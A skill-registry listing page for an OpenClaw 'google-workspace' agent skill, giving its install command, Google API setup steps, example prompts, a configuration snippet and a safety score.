ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Integrate Gmail, Calendar, Sheets, and Docs into OpenClaw. Automate your workspace tasks with this powerful agent skill for seamless data management and communication.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-devfw
Or

What This Skill Does

The google-workspace skill provides a comprehensive bridge between your local OpenClaw agent and the Google Workspace ecosystem. By leveraging the official Google APIs, it empowers your AI agent to act as a personal assistant, capable of reading and drafting emails, managing your busy calendar, querying and updating complex spreadsheets, and generating documents within Google Docs. It handles the heavy lifting of authentication and session management via the required openclaw-agent, allowing for secure, authenticated interaction with your personal data.

Installation

To integrate this skill into your OpenClaw environment, execute the following command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-devfw. Before running, ensure you have the openclaw-agent utility installed (as detailed in the prerequisites). You must then create a project in the Google Cloud Console, enable the necessary APIs (Gmail, Calendar, Drive, etc.), and place your credentials.json file in your working directory. Finally, initialize the authentication flow as described in the setup documentation to link your Google account.

Use Cases

This skill is ideal for automating repetitive administrative tasks. You can use it to summarize your daily email inbox, automatically schedule meetings based on content found in emails, update project trackers in Google Sheets without manual data entry, or draft standardized reports directly into Google Docs. It is perfect for users who want to reduce the 'context switching' between communication platforms and data management tools.

Example Prompts

  1. "Check my Gmail and summarize the three most recent unread emails from my manager."
  2. "Add a meeting to my Google Calendar for tomorrow at 2 PM titled 'Project Sync' with the description 'Review quarterly goals'."
  3. "Search my spreadsheet titled 'Sales Tracker' and give me the sum of all values in the 'Revenue' column."

Tips & Limitations

Always ensure your token.pickle file is stored securely as it contains your authorization credentials. Be mindful of Google's API rate limits if you are processing large volumes of data. If the connection fails, verify that the openclaw-agent background process is active and that your OAuth credentials have not expired. For complex spreadsheet operations, ensure the sheet is formatted consistently to allow the agent to parse cells correctly.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-devfw": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#google-workspace#automation#productivity#gmail#api
Safety Score: 3/5

Flags: network-access, file-read, external-api